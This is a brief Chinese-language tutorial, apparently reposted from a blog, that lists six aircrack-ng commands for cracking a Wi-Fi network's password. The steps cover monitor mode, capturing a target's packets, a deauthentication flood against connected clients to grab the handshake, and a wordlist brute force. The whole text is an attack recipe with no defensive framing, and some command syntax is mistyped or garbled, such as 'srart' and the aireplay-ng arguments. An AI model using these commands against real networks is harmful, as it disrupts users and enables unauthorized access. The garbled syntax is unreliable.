第一步:结束影响本次测试的进程 airmon-ng check kill 第二步:启动网卡的监听 airmon-ng srart wlan0 第三步:查看无线网络 airodump-ng wlan0mon 第四步:嗅探数据包 airodump-ng -c 信道 -w cap保存路径 --bssid 目标MAC wlan0mon 第五步:解除认证攻击模式、泛洪攻击,获取握手包 aireplay-ng -0(0代表模拟AP) 次数 信道 -a 目标MAC -c 客户端MAC wlan0mon 第六步:暴力破解 aircrack-ng -w 字典路径和文件 保存的路径/*.cap
原文:https://www.cnblogs.com/xfstu/p/12698587.html